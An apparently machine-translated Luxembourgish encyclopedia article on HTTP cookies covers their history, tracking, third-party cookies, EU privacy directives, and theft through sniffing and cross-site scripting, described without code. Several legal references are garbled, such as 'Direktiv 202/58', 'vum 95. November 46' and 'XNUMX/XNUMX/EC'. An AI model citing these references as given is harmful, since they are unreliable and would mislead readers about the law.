Un Cookie oder Web Cookie (oder Kichelcher, verkierzt als Zeien am Québec) gëtt vum HTTP-Kommunikatiounsprotokoll definéiert als eng Sequenz vun Informatioun, déi vun engem HTTP-Server un en HTTP-Client geschéckt gëtt, deen dee Leschten all Kéier wann dee selwechte HTTP-Server ënner bestëmmte Konditioune gefrot gëtt.
De Cookie ass d'Äquivalent vun engem kleng Textdatei um Terminal gespäichert vum Internet Benotzer. Existéiert fir méi wéi 20 Joer, erlaben se Websäitentwéckler Benotzerdaten ze späicheren fir hir Navigatioun ze erliichteren a verschidde Funktionalitéiten z'erméiglechen. Cookies waren ëmmer méi oder manner kontrovers, well se Rescht perséinlech Informatioun enthalen, déi potenziell vun Drëttubidder exploitéiert kënne ginn.
Et gëtt als HTTP Header vum Webserver an de Webbrowser geschéckt, deen et onverännert zréckkënnt all Kéier wann et op de Server kënnt. E Cookie ka benotzt ginn eng Authentifikatioun, eng Sëtzung (Staat Ënnerhalt), a fir späichert spezifesch Informatioun iwwer de Benotzer, wéi Site Virléiften oder den Inhalt vun engem elektroneschen Akafsweenchen. De Begrëff Cookie ass ofgeleet vun magesch Cookie, e bekannte Konzept am UNIX Informatik, deen d'Iddi an den Numm vu Browser Cookien inspiréiert huet. E puer Alternativen zu Cookien existéieren, jidderee mat hiren eegene Gebrauch, Virdeeler an Nodeeler.
Sinn einfach Textdateien, Cookien sinn net ausführbar. Si sinn net weder Spyware nach Viren, obwuel Cookien vun e puer Siten vu villen Anti-Virus Software erkannt ginn, well se d'Benotzer erlaben ze verfolgen wann se verschidde Site besichen.
Déi meescht modern Browser erlaben d'Benotzer entscheeden ob Cookien akzeptéieren oder refuséieren. Benotzer kënnen och wielt wéi laang Cookien gespäichert ginn. Wéi och ëmmer, déi komplett Oflehnung vu Cookien mécht e puer Siten onbrauchbar. Zum Beispill späichere Shopping Weenchen oder Siten déi Login erfuerderen mat Umeldungsinformatiounen (Benotzernumm a Passwuert).
historique
de Begrëff Cookie kënnt aus dem englesche Begrëff magesch Cookie, wat e Paket vun Daten ass, déi e Programm kritt an onverännert zréckkënnt. Cookien goufen schonn an IT benotzt wann Lou Montulli hat d'Iddi fir se an de Webkommunikatioun ze benotzen am Juni 1994. Deemools war hie vun Netscape Communications beschäftegt, déi eng E-Commerce-Applikatioun fir e Client entwéckelt huet. Cookien hunn eng Léisung fir de Problem vun der Zouverlässegkeet vun der virtueller Shopping Cart Implementatioun vun engem Geschäft ginn.
Den John Giannandrea an de Lou Montulli hunn datselwecht Joer dem Netscape seng éischt Cookie Spezifikatioun geschriwwen. Versioun 0.9 Beta vu Mosaic Netscape, verëffentlecht den 13. Oktober 1994, integréiert Cookie Technologie (gesinn Post). Déi éischt (net-experimentell) Benotzung vu Cookien war fir ze bestëmmen ob Besucher vun der Netscape Websäit de Site virdrun besicht hunn. De Montulli huet 1995 eng Patentanwendung fir Cookie-Technologie ofginn, an den US Patent 5774670 gouf accordéiert. 1998 ausgezeechent.
Nodeems se an Netscape 0.9 Beta am Joer 1994 implementéiert goufen, goufen Cookien an Internet Explorer 2 integréiert, am Oktober 1995 verëffentlecht.
D'Aféierung vu Cookien ass nach net allgemeng bekannt fir de Public. Besonnesch Cookien goufen als Standard an de Browser-Astellunge akzeptéiert, an d'Benotzer goufen net iwwer hir Präsenz informéiert. Verschidde Leit ware sech ronderëm den éischte Véierel vun 1995 bewosst iwwer d'Existenz vu Cookien, awer d'Allgemengheet huet hir Existenz eréischt no der Financial Times publizéiert den 12. Februar 1996. Am selwechte Joer krute Cookien vill Medienopmierksamkeet. wéinst méiglech Privatsphär Agrëff. D'Thema vu Cookien gouf an zwou Konsultatiounen vun der American Federal Trade Commission am Joer 1996 an 1997 diskutéiert.
D'Entwécklung vun der offizieller Cookie Spezifikatioun war schonn amgaang. Déi éischt Diskussioune vun der offizieller Spezifizéierung hunn am Abrëll 1995 op der www-talk Mailing Lëscht stattfonnt. E speziellen IETF Aarbechtsgrupp gouf gegrënnt. Zwee alternativ Propositioune fir Aféierung Staat zu HTTP Transaktiounen goufen vum Brian Behlendorf an David Kristol proposéiert respektiv, mä de Grupp, gefouert vum Kristol selwer, decidéiert Netscape Spezifizéierung als Ausgangspunkt ze benotzen. Am Februar 1996 huet den Aarbechtsgrupp festgestallt datt Drëtt Partei Cookien eng bedeitend Gefor fir de Privatsphärschutz wieren. D'Spezifikatioun vun der Grupp produzéiert gouf schlussendlech publizéiert als RFC 2109.
Vun Enn 2014 un gesi mir op ville Siten e Banner iwwer Cookien. Et gëtt op d'mannst eng Browser Extensioun déi erlaabt de Banner net ugewisen.
Aarte vu Cookien a Gebrauch
Sëtzung Gestioun
Cookies kënne benotzt ginn fir Benotzerdaten während der Navigatioun z'erhalen, awer och iwwer verschidde Visiten. Cookies goufen agefouert fir e Mëttel ze bidden fir elektronesch Akafsween ze realiséieren, e virtuellen Apparat an deem de Benotzer d'Saachen sammele kann, déi hie wëll kafen, während de Site surft.
Dës Deeg späicheren Apps wéi Shopping Weenchen amplaz d'Lëscht vun den Artikelen an enger Datebank op engem Server, wat am léifsten ass; wéi se am Cookie selwer ze späicheren. De Webserver schéckt e Cookie mat enger eenzegaarteger Sessiouns-ID. De Webbrowser gëtt dann dës Sessiouns-ID op all spéider Ufro zréck an d'Elementer am Kuerf gi gespäichert a mat dëser selwechter eenzegaarteger Sessiouns-ID assoziéiert.
Heefeg Notzung vu Cookien ass nëtzlech fir Iech op e Site mat Umeldungsinformatiounen ze aloggen. Kuerz gesot, de Webserver schéckt als éischt e Cookie mat enger eenzegaarteger Sessiouns-ID. Da gitt d'Benotzer hir Umeldungsinformatiounen (normalerweis e Benotzernumm a Passwuert). D'Webapplikatioun authentifizéiert dann d'Sessioun an erlaabt de Benotzer Zougang zum Service.
Personaliséierung
Cookies kënne benotzt ginn fir Informatioun iwwer de Benotzer vun engem Site ze erënneren, fir him an Zukunft entspriechend Inhalt ze weisen. Zum Beispill kann e Webserver e Cookie schécken deen de leschte Benotzernumm enthält, dee benotzt gouf fir op dës Websäit aloggen, sou datt de Benotzernumm bei zukünftege Besuche virausgesat ka ginn.
Vill Websäite benotze Cookien fir Personaliséierung baséiert op Benotzervirléiften. D'Benotzer wielt hir Virléiften an enger Form a schéckt dës un de Server. De Server codéiert d'Astellungen an engem Cookie a schéckt se an de Browser zréck. Duerno, all Kéier wann de Benotzer op eng Säit vun dësem Site kënnt, gëtt de Browser de Cookie zréck an dofir d'Lëscht vun de Virléiften; de Server kann dann d'Säit no de Virléiften vum Benotzer personaliséieren. Zum Beispill erlaabt d'Wikipedia Websäit senge Benotzer d'Haut vum Site ze wielen deen se léiwer maachen. D'Google Sichmotor erlaabt seng Benotzer (och wa se net registréiert sinn) d'Zuel vun de Resultater ze wielen déi se op all Resultater Säit wëllen gesinn.
Tracking
Tracking Cookien gi benotzt fir d'Browsegewunnechten vun den Internet Benotzer ze verfolgen. Dëst kann och deelweis gemaach ginn andeems Dir d'IP Adress vum Computer benotzt, déi eng Ufro fir eng Säit mécht oder andeems Dir den 'Referrer' HTTP Header benotzt, deen de Client mat all Ufro schéckt, awer Cookien erlaben méi Präzisioun. Dëst kann gemaach ginn wéi am folgende Beispill:
- Wann de Benotzer eng Säit op engem Site oprufft, an d'Ufro enthält kee Cookie, geet de Server un datt dëst déi éischt Säit ass, déi de Benotzer besicht huet. De Server erstellt dann eng zoufälleg String a schéckt se an de Browser zesumme mat der ugefrote Säit.
- Vun dësem Moment un gëtt de Cookie automatesch vum Browser geschéckt all Kéier wann eng nei Säit vum Site genannt gëtt. De Server schéckt d'Säit wéi gewinnt, awer protokolléiert och d'URL vun der genannter Säit, den Datum, d'Zäit vun der Ufro an de Cookie an enger Logdatei.
Andeems Dir d'Logdatei kuckt, ass et dann méiglech ze gesinn, wéi eng Säiten de Benotzer besicht huet an a wéi enger Reiefolleg. Zum Beispill, wann d'Datei e puer Ufroe enthält, déi mam id=abc Cookie gemaach goufen, kann dëst feststellen datt all dës Ufroe vum selwechte Benotzer kommen. D'URL ugefrote, den Datum an d'Zäit verbonne mat den Ufroen erlaben de Benotzer säi Surfen ze verfolgen.
Drëtt-Partei Cookien a Web Beaconen, hei ënnen erkläert, aktivéieren zousätzlech Tracking iwwer verschidde Siten. Single Site Tracking gëtt allgemeng fir statistesch Zwecker benotzt. Am Géigesaz, Tracking iwwer verschidde Site mat Drëtt Partei Cookien gëtt allgemeng vu Reklammefirmen benotzt fir anonym Benotzerprofile ze produzéieren (déi dann benotzt gi fir ze bestëmmen wéi eng Annoncë dem Benotzer gewise solle ginn an och fir him E-Mailen ze schécken entspriechend dës Annoncen - SPAM ).
Tracking Cookien sinn e Risiko vun der Invasioun vun der Privatsphär vum Benotzer, awer si kënne ganz einfach geläscht ginn. Déi meescht modern Browser enthalen eng Optioun fir persistent Cookien automatesch ze läschen wann Dir d'Applikatioun zoumaacht.
Drëtt Partei Cookien
Biller an aner Objeten, déi op enger Websäit enthale sinn, kënnen op Serveren anescht sinn wéi deen, deen d'Säit host. Fir d'Säit ze weisen, luet de Browser all dës Objeten erof. Déi meescht Websäite enthalen Informatioun aus verschiddene Quellen. Zum Beispill, wann Dir www.example.com an Äre Browser schreift, ginn et dacks Objeten oder Reklammen op en Deel vun der Säit, déi aus verschiddene Quelle kommen, dh aus engem aneren Domain wéi www. .example.com. "Éischt" Partei Cookien si Cookien, déi vum Domain an der Adressbar vum Browser gesat ginn. Drëtt-Partei Cookien ginn vun engem vun de Säitobjekter gesat, deen aus engem aneren Domain kënnt.
Par défaut akzeptéieren Browser wéi Mozilla Firefox, Microsoft Internet Explorer an Opera Drëtt Partei Cookien, awer d'Benotzer kënnen d'Astellungen an de Browseroptiounen änneren fir se ze blockéieren. Et gëtt kee Sécherheetsrisiko inherent an Drëtt Partei Cookien déi Webfunktionalitéit erméiglechen, awer si ginn och benotzt fir Benotzer ze verfolgen. vu Site zu Site.
Tools wéi Ghostery verfügbar fir all Browser inklusiv Google Chrome kënnen Austausch tëscht Drëtt Parteien blockéieren.
Ëmsetzung
Cookies si kleng Stécker vun Daten, déi vum Webserver an de Browser geschéckt ginn. De Browser bréngt se onverännert op de Server zréck, a féiert den Zoustand (Erënnerung un vergaangenen Eventer) an déi soss stateless HTTP Transaktioun. Ouni Cookien ass all Erhuelung vun enger Websäit oder e Bestanddeel vun enger Websäit en isoléiert Event, onofhängeg vun aneren Ufroen, déi op dee selwechte Site gemaach ginn. Zousätzlech datt se vum Webserver gesat kënne ginn, kënnen d'Cookien och duerch Skriptsprooche wéi JavaScript gesat ginn, wa se vum Browser ënnerstëtzt an autoriséiert sinn.
Déi offiziell Cookie Spezifizéierung seet datt Browser fäeg sinn e Minimum Zuel vu Cookien ze späicheren an nei ze schécken. Speziell soll e Browser fäeg sinn op d'mannst 300 Cookien vu véier Kilobytes all ze späicheren, an op d'mannst 20 Cookien fir een eenzegen Server oder Domain.
No Sektioun 3.1 vun RFC 2965, Cookiennimm sinn case-onsensitiv.
E Cookie kann den Datum vu sengem Verfall spezifizéieren, an deem Fall gëtt de Cookie op dësem Datum geläscht. Wann de Cookie keen Verfallsdatum uginn, gëtt de Cookie geläscht soubal de Benotzer säi Browser verléisst. Dofir, en Verfallsdatum ze spezifizéieren ass e Wee fir de Cookie duerch verschidde Sessiounen ze iwwerliewen. Aus dësem Grond gi Cookien mat engem Verfallsdatum gesot bestänneg. E Beispillapplikatioun: e Retail Site kéint persistent Cookien benotzen fir d'Elementer opzehuelen, déi d'Benotzer an hirem Shopping Weenchen gesat hunn (a Wierklechkeet kann de Cookie op eng Entrée bezéien, déi an enger Datebank um Site vum Verkaf gespäichert ass, an net op Ärem Computer) . Duerch dës Mëttel, wann d'Benotzer hire Browser verloossen ouni e Kaf ze maachen a spéider dorop zréckkommen, kënnen se d'Elementer am Weenchen erëm fannen. Wann dës Cookien net en Verfallsdatum ginn, gi se oflafen wann de Browser zou ass, an d'Informatioun iwwer den Inhalt vum Kuerf géif verluer goen.
Cookies kënnen am Ëmfang limitéiert sinn op e spezifescht Domain, Subdomain oder Wee um Server deen se erstallt huet.
Schafung vun engem Cookie
Den Transfer vu Websäite gëtt mam HyperText Transfer Protocol (HTTP) gemaach. Andeems Dir Cookien ignoréiert, ruffen d'Browser eng Säit vu Webserveren un, andeems se allgemeng e kuerzen Text nennen HTTP Ufro. Zum Beispill, fir op d'Säit www.example.org/index.html ze kommen, verbannen d'Browser mam Server www.example.org a schécken eng Ufro déi esou ausgesäit:
| GET /index.html HTTP/1.1Host: www.example.org | ||
| Navigator | → | Server |
De Server reagéiert andeems Dir déi ugefrote Säit schéckt, viraus vun engem ähnlechen Text, de ganze Wiesen genannt HTTP Äntwert. Dëse Paket kann Zeilen enthalen déi de Browser instruéieren Cookien ze späicheren:
| HTTP/1.1 200 OKContent-Typ: text/htmlSet-Cookie: Numm = Wäert (HTML Säit) | ||
| Navigator | ← | Server |
De Server schéckt nëmmen d'Set-Cookie-Linn, wann de Server wëllt datt de Browser e Cookie späichert. Set-Cookie ass eng Ufro fir de Browser den Numm = Wäert String ze späicheren an et an all zukünfteg Ufroen un de Server zréckzeginn. Wann de Browser Cookien ënnerstëtzt an d'Cookien an de Browseroptiounen aktivéiert sinn, gëtt de Cookie an all spéider Ufroen op dee selwechte Server abegraff. Zum Beispill nennt de Browser d'Säit www.example.org/news.html andeems Dir déi folgend Ufro un de Server www.example.org schéckt:
| GET /news.html HTTP/1.1Host: www.example.orgCookie: name=valueAccept: */* | ||
| Navigator | → | Server |
Dëst ass eng Ufro fir eng aner Säit vum selwechte Server, an ënnerscheet sech vun der éischter uewen, well et eng String enthält, déi de Server virdru an de Browser geschéckt huet. Dank dësem Mëttel weess de Server datt dës Ufro mat der viregter verbonnen ass. De Server reagéiert andeems Dir déi genannte Säit schéckt, an och andeems Dir aner Cookien derbäi setzt.
De Wäert vum Cookie kann vum Server geännert ginn andeems Dir eng nei Zeil Set-Cookie schéckt: name=new_value als Äntwert op déi genannte Säit. De Browser ersetzt dann den alen Wäert mam neien.
D'Set-Cookie Linn gëtt normalerweis vun engem CGI Programm oder enger anerer Skriptsprooch erstallt, net vum HTTP-Server. Den HTTP-Server (Beispill: Apache) iwwerdréit nëmmen d'Resultat vum Programm (en Dokument virum Header mat de Cookien) un de Browser.
Cookien kënnen och duerch JavaScript oder aner ähnlech Sprooche gesat ginn, déi am Browser lafen, dh op der Client Säit anstatt op der Server Säit. Am JavaScript gëtt den document.cookie Objet fir dësen Zweck benotzt. Zum Beispill erstellt d'Erklärung document.cookie = "temperatur=20" e Cookie mam Numm "Temperatur" a mat engem Wäert vun 20.
Attributer vun engem Cookie
Zousätzlech zum Numm/Wäertpaar kann e Cookie och en Verfallsdatum, e Wee, en Domain Numm an d'Zort vun der geplangter Verbindung enthalen, dh normal oder verschlësselte. RFC 2965 definéiert och datt Cookien eng obligatoresch Versiounsnummer mussen hunn, awer dëst gëtt allgemeng ausgelooss. Dës Datendeeler verfollegen dem Numm = new_value Pair a gi vu Semikolon getrennt. Zum Beispill kann e Cookie vum Server erstallt ginn andeems Dir eng Set-Cookie-Linn schéckt: name=new_value; expires=Datum; Wee =/; domain=.example.org.
Verfall vun engem Cookie
Cookies lafen aus a ginn dann net vum Browser op de Server an de folgende Situatiounen geschéckt:
- Wann de Browser zou ass, wann de Cookie net persistent ass.
- Wann de Cookie Verfallsdatum vergaang ass.
- Wann de Cookie Verfallsdatum geännert gëtt (vum Server oder dem Skript) op en Datum an der Vergaangenheet.
- Wann de Browser de Cookie op Ufro vum Benotzer läscht.
Déi drëtt Situatioun erlaabt Serveren oder Scripten explizit e Cookie ze läschen. Bedenkt datt et méiglech ass mam Google Chrome Webbrowser den Verfallsdatum vun engem bestëmmte Cookie ze kennen andeems Dir op d'Inhaltsastellunge kënnt. E Cookie, deen um Computer gespäichert ass, ka ganz gutt fir e puer Joerzéngte do bleiwen, wa keng Prozedur geholl gëtt fir se ze läschen.
Stereotypen
Zënter hirer Aféierung um Internet si vill Iddien iwwer Cookien um Internet an an de Medien zirkuléiert. Am Joer 1998, CIAC, en United States Department of Energy Computer Incident Monitoring Team, huet festgestallt datt Cookie Sécherheetsschwieregkeeten "wesentlech net existéierend" waren an erkläert datt "Informatioun iwwer den Urspronk vun Äre Visiten an d'Detailer vun de Websäiten déi Dir besicht hutt. existéiert schonn an de Logdateien vun de Webserver". Am Joer 2005 huet d'Jupiter Research d'Resultater vun enger Studie publizéiert, an där e bedeitende Prozentsaz vun de Befroten déi folgend Aussoe betruecht huet:
- Cookien sinn wéi Virus, si infizéieren d'Harddisken vun de Benotzer.
- Cookien generéieren Pop weider.
- Cookies gi benotzt fir ze schécken Spam.
- Cookies ginn nëmme fir Reklammen benotzt.
Cookien kënnen d'Informatioun vum Computer vum Benotzer net läschen oder liesen. Wéi och ëmmer, Cookien maachen et méiglech d'Websäiten z'entdecken déi vun engem Benotzer op engem bestëmmte Site oder Set vu Siten besicht ginn. Dës Informatioun kann an engem Benotzerprofil gesammelt ginn, dee ka benotzt oder un Drëttubidder weiderverkaaft ginn, wat e seriöse Privatsphärprobleemer stellen kann. E puer Profiler sinn anonym, am Sënn datt se keng perséinlech Informatioun enthalen, awer och esou Profiler kënnen a Fro stellen.
Laut der selwechter Etude, e groussen Prozentsaz vun Internet Benotzer weess net wéi Cookien ze läschen. Ee vun de Grënn firwat d'Leit Cookien net vertrauen ass datt verschidde Siten de perséinlechen Identifikatiounsaspekt vu Cookien mëssbraucht hunn an dës Informatioun mat anere Quelle gedeelt hunn. E grousse Prozentsaz vun geziilte Reklammen an onerwënscht E-Mail, als Spam ugesinn, kënnt aus Informatioun, déi aus Tracking-Cookien gesammelt gëtt.
Browser Astellunge
Déi meescht Browser ënnerstëtzen Cookien an erlaben de Benotzer se auszeschalten. Déi meescht üblech Optiounen sinn:
- Aktivéiert oder deaktivéiert Cookien komplett, sou datt se permanent akzeptéiert oder blockéiert ginn.
- Erlaabt de Benotzer déi aktiv Cookien op enger bestëmmter Säit ze gesinn, andeems Dir Javascript: alert(document.cookie) an der Adressbar vum Browser aginn. E puer Browser integréieren e Cookie-Manager fir de Benotzer, deen d'Cookien, déi momentan vum Browser gespäichert sinn, kucken a selektiv läschen.
Déi meescht Browser erlaben och komplett Läsch vu perséinlechen Donnéeën, déi Cookien enthalen. Zousätzlech Moduler fir Cookie Permissiounen ze kontrolléieren existéieren och.
Privatsphär an Drëtt Partei Cookien
An dësem fiktive Beispill huet eng Werbefirma Banneren op zwou Websäiten gesat. Andeems Dir d'Banerer op hire Serveren hosten an Drëtt Partei Cookien benotzt, ass d'Werbefirma fäeg d'Navigatioun vum Benotzer duerch dës zwee Site ze verfolgen.
Cookien hu wichteg Implikatioune fir d'Privatsphär an d'Anonymitéit vun de Webbenotzer. Och wann d'Cookien nëmmen op de Server zréckgeschéckt ginn, deen se agestallt huet, oder op e Server, deen zum selwechten Internet-Domain gehéiert, kann eng Websäit awer Biller oder aner Komponenten enthalen, déi op Serveren, déi zu aneren Domainen gehéieren, enthalen. D'Cookien, déi während der Erhuelung vun dësen externen Komponenten gesat ginn, ginn genannt Drëtt Partei Cookien. Dëst beinhalt Cookien vun ongewollten Pop-upfenster.
Werbefirmen benotzen Drëtt Partei Cookien fir Benotzer iwwer déi verschidde Siten ze verfolgen déi se besichen. Besonnesch eng Werbefirma kann e Benotzer iwwer all Säiten verfollegen, wou se Reklammebilder oder e Tracking-Pixel gesat huet. Wësse vun de Säiten, déi vum Benotzer besicht ginn, erlaabt d'Werbefirma fir d'Werbevirléiften vum Benotzer ze zielen.
D'Kapazitéit fir e Benotzerprofil ze bauen gëtt vun e puer als Privatsphärinvasioun ugesinn, besonnesch wann d'Verfollegung iwwer verschidden Domainen mat Drëtt Partei Cookien gemaach gëtt. Aus dësem Grond hunn e puer Länner Cookie Gesetzgebung.
D'USA Regierung huet strikt Reegele fir d'Plazéierung vu Cookien am Joer 2000 implementéiert, nodeems et opgedeckt gouf datt de White House Drug Policy Office Cookien benotzt fir d'Computer vun de Benotzer ze verfolgen déi online Drogenreklammen kucken. Am Joer 2002 huet de Privatsphär Aktivist Daniel Brandt entdeckt datt d'CIA persistent Cookien op Computeren hannerlooss hunn, déi hir Websäite besicht hunn. Eemol iwwer dës Verstouss informéiert, huet d'CIA erkläert datt dës Cookien net virsiichteg geschéckt goufen an opgehalen se ze setzen. De 25. Dezember 2005 huet de Brandt entdeckt datt d'National Security Agency (NSA) wéinst engem Softwareupdate zwee persistent Cookien op de Computer vun de Visiteuren hannerlooss huet. Nodeems se matgedeelt goufen, huet d'NSA direkt Cookien ausgeschalt.
A Groussbritannien huet de Cookie Gesetz ", a Kraaft getrueden de 25. Mee 2012, verflicht d'Siten hir Intentiounen ze deklaréieren, sou datt d'Benotzer kënnen wielen ob se Spure vun hirem Passage um Internet wëllen hannerloossen oder net. Si kënne sou geschützt ginn vu Reklammzielung. Allerdéngs, geméiss de Guardian, d'Zoustëmmung vun den Internet Benotzer ass net onbedéngt explizit; Ännerungen goufen op d'Konditioune vun Benotzer Zoustëmmung gemaach, mécht et also implizéiert.
Direktiv 2002/58 iwwer Privatsphär
D'Direktiv 202/58 Privatsphär an elektronesch Kommunikatioun enthält Regelen iwwer d'Benotzung vu Cookien. Besonnesch den Artikel 5, Abschnitt 3 vun dëser Direktiv erfuerdert datt d'Späichere vun Daten (wéi Cookien) um Computer vum Benotzer nëmme ka gemaach ginn wann:
- de Benotzer informéiert gëtt wéi d'Donnéeë benotzt ginn;
- de Benotzer gëtt d'Méiglechkeet dës Stockage Operatioun ze refuséieren. An dësem Artikel steet awer och, datt d'Späichere vun Donnéeën aus technesche Grënn vun dësem Gesetz befreit ass.
D'Direktiv, déi ab Oktober 2003 ëmgesat soll ginn, gouf awer eréischt ganz onvollstänneg an d'Praxis no engem Rapport vum Dezember 2004 ëmgesat, deen och drop higewisen huet, datt verschidde Memberstaaten (Slowakei, Lettland, Griicheland, Belsch a Lëtzebuerg) nach net ëmgesat haten. Direktiv an intern Gesetz.
No der Meenung vum G29 am Joer 2010, bleift dës Direktiv, déi notamment d'Benotzung vu Cookien fir Verhalensreklammenzwecker bedingt, op der explizit Zoustëmmung vum Internet Benotzer ganz schlecht applizéiert. Tatsächlech maachen déi meescht Siten dat op eng Manéier déi net der Direktiv entsprécht, andeems se sech op en einfachen "Banner" beschränken, deen d'Benotzung vu "Cookien" informéiert ouni Informatiounen iwwer d'Benotzung ze ginn, ouni tëscht "techneschen" Cookien ze differenzéieren. "Tracking" Cookien, nach fir de Benotzer e richtege Choix ze bidden deen technesch Cookien erhalen wëllt (wéi Shopping Cart Management Cookien) an "Tracking" Cookien refuséieren. Tatsächlech funktionnéiere vill Siten net korrekt wann Cookien refuséiert ginn, wat net mat der Direktiv 2002/58 oder der Direktiv 95/46 (Schutz vu perséinlechen Donnéeën) entsprécht.
Direktiv 2009/136/CE
Dëst Material gouf vun der Direktiv 2009/136/EC vum 25. November 2009 vum 95. November 46 aktualiséiert, déi seet datt d'"Späichere vun Informatioun, oder Zougang zu scho gespäichert Informatiounen ze kréien, an der Terminalausrüstung vun engem Abonnent oder Benotzer nëmmen op Bedingung erlaabt ass datt de Abonnent oder Benotzer huet seng Zoustëmmung ginn, nodeems hien, am Aklang mat der Direktiv XNUMX/XNUMX/EC, kloer a komplett Informatioun tëscht aneren iwwer d'Ziler vun der Veraarbechtung kritt huet. Déi nei Direktiv stäerkt dofir d'Verpflichtungen virum Cookien um Computer vum Internet Benotzer.
An de virleefeg Iwwerleeunge vun der Direktiv präziséiert den europäesche Législateur awer: "Wou technesch méiglech an effektiv, am Aklang mat den zoustännege Bestëmmunge vun der Direktiv 95/46/EC, kann d'Zoustëmmung vum Benotzer mat Bezuch op d'Veraarbechtung duerch d'Veraarbechtung ausgedréckt ginn. Benotzung vun de passenden Astellunge vun engem Browser oder enger anerer Applikatioun". Awer tatsächlech, kee Browser bis haut mécht et méiglech déi wesentlech technesch Cookien vun den fakultativen ze dissoziéieren, déi dem Benotzer säi Choix iwwerloosse sollen.
Dës nei Direktiv gouf vun de belschen Deputéierten am Juli 2012 ëmgesat. Eng Etude vun 2014 weist, datt och Deputéiert kämpfen fir ze gëllen. d'Aschränkungen vun der Direktiv.
P3P
D'P3P Spezifizéierung enthält d'Fäegkeet fir e Server eng Privatsphär Politik ze soen, déi definéiert wéi eng Informatioun se sammelt a fir wéi en Zweck. Dës Politiken enthalen (awer sinn net limitéiert op) d'Benotzung vun Informatioun gesammelt mat Cookien. Geméiss den Definitioune vu P3P, kann e Browser Cookien akzeptéieren oder refuséieren andeems Dir d'Privatsphär Politiken mat de Virléiften vum Benotzer vergläicht oder andeems Dir de Benotzer freet, d'Privatsphär Politik Dateschutzerklärung presentéiert vum Server deklaréiert.
Vill Browser, dorënner Apple Safari a Microsoft Internet Explorer Versiounen 6 an 7, ënnerstëtzen P3P wat de Browser erlaabt ze bestëmmen ob Drëtt Partei Cookielagerung akzeptéiert. Den Opera Browser erlaabt d'Benotzer Drëtt Partei Cookien ze refuséieren an e globalen a spezifesche Sécherheetsprofil fir Internet Domainen ze kreéieren. Mozilla Firefox Versioun 2 huet P3P Ënnerstëtzung erofgelooss, awer huet se an der Versioun 3 zréckgesat.
Drëtt Partei Cookien kënne vun de meeschte Browser blockéiert ginn fir d'Privatsphär ze erhéijen an d'Annonce Tracking ze reduzéieren, ouni d'Weberfahrung vum Benotzer negativ ze beaflossen. Vill Werbeagenturen bidden eng Optioun optrieden fir geziilte Reklammen, andeems Dir e generesche Cookie am Browser opstellt, deen dës Zilsetzung deaktivéiert, awer sou eng Léisung ass net praktesch effektiv, wann se respektéiert gëtt, well dëse generesche Cookie geläscht gëtt soubal de Benotzer dës Cookien läscht, wat den Opt annuléiert eraus Entscheedung.
Nodeeler vu Cookien
Nieft Privatsphär Problemer, Cookien hunn och e puer technesch Nodeeler. Besonnesch, se net ëmmer präziist Benotzer z'identifizéieren, si kënnen Site Leeschtung lues wann an grouss Zuelen, si kënne fir Sécherheet Attacken benotzt ginn, a si Konflikt mat der representativ Staat Transfert, architektonescht Stil vun der Software.
Onpräzis Identifikatioun
Wa méi wéi ee Browser op engem Computer benotzt gëtt, gëtt et an all eenzel vun hinnen ëmmer eng separat Späichereenheet fir Cookien. Cookien identifizéieren also keng Persoun, mee d'Kombinatioun vun engem Benotzerkont, engem Computer an engem Webbrowser. Sou kann jiddereen dës Konte benotzen, Computeren, oder Browser, datt d'Panoplie vu Cookien hunn. Ähnlech ënnerscheeden d'Cookien net tëscht e puer Benotzer, déi deeselwechte Benotzerkont, Computer a Browser deelen, sou wéi an "Internetcaféen" oder iergendeng Plaz déi gratis Zougang zu Computerressourcen gëtt.
Mä an der Praxis ass dës Behaaptung an de meeschte Fäll falsch, well haut e "perséinleche" Computer (oder e Smartphone, oder Tablet, wat méi schlëmm ass) haaptsächlech vun engem eenzegen Individuum benotzt gëtt. duerch de Volume vun gesammelt Informatioune kommen op personaliséiert Zilsetzung och wann d'Persoun net "nämlech" identifizéiert ass.
Déifstall vu Cookien
E Cookie ka vun engem anere Computer am Netz geklaut ginn.
Wärend der normaler Operatioun ginn Cookien tëscht dem Server (oder enger Grupp vu Serveren am selwechte Domain) an dem Computerbrowser vum Benotzer zréckgeschéckt. Zënter Cookien kënnen sensibel Informatioun enthalen (Benotzernumm, e Passwuert benotzt fir d'Authentifikatioun, etc.), sollten hir Wäerter net fir aner Computeren zougänglech sinn. Cookie Déif ass en Akt vun Offang vu Cookien vun engem onerlaabten Drëtte Partei.
Cookies kënne geklaut ginn iwwer e Packet Sniffer an engem Attack genannt Sessiounskaping. Verkéier um Netz kann ofgefaangen a gelies ginn vun anere Computeren wéi déi, déi schécken a kréien (besonnesch op der onverschlësselter ëffentlecher Wi-Fi Plaz). Dëse Traffic enthält Cookien, déi iwwer Sessiounen mat dem einfachen HTTP-Protokoll geschéckt ginn. Wann de Netzverkéier net verschlësselt ass, kënnen béisaarteg Benotzer also d'Kommunikatioune vun anere Benotzer am Netz mat "Packet Sniffers" liesen.
Dëse Problem kann iwwerwonne ginn andeems d'Verbindung tëscht dem Computer vum Benotzer an dem Server mam HTTPS Protokoll verschlësselt gëtt. E Server kann spezifizéieren a sécher Fändel beim Kader vun engem Cookie; de Browser schéckt et nëmmen iwwer eng sécher Linn, wéi eng SSL Verbindung.
Wéi och ëmmer, vill Siten, obwuel se mat HTTPS verschlësselte Kommunikatioun fir d'Benotzer Authentifikatioun benotzen (dh d'Login Säit), spéider schécken Sessiouns-Cookien an aner Daten wéi normal, duerch onverschlësselte HTTP-Verbindungen aus Effizienzgrënn. Ugräifer kënnen also d'Cookien vun anere Benotzer interceptéieren an se op passenden Siten virstellen oder se an Cookieattacken benotzen.
Scripting um Site: e Cookie, deen nëmmen tëscht dem Server an dem Client ausgetauscht soll ginn, gëtt un eng aner Drëtt Partei geschéckt.
Eng aner Manéier fir Cookien ze klauen ass Siten ze skriptéieren an de Browser selwer Cookien op béiswëlleg Serveren ze schécken déi se ni kréien. Moderne Browser erlaben d'Ausféierung vun gesichte Deeler vum Code vum Server. Wann Cookien während der Runtime zougänglech sinn, kënnen hir Wäerter an iergendenger Form un Serveren kommunizéiert ginn, déi net op hinnen zougräifen. D'Verschlësselung vu Cookien ier se iwwer d'Netz geschéckt ginn hëlleft net den Attack ze verhënneren.
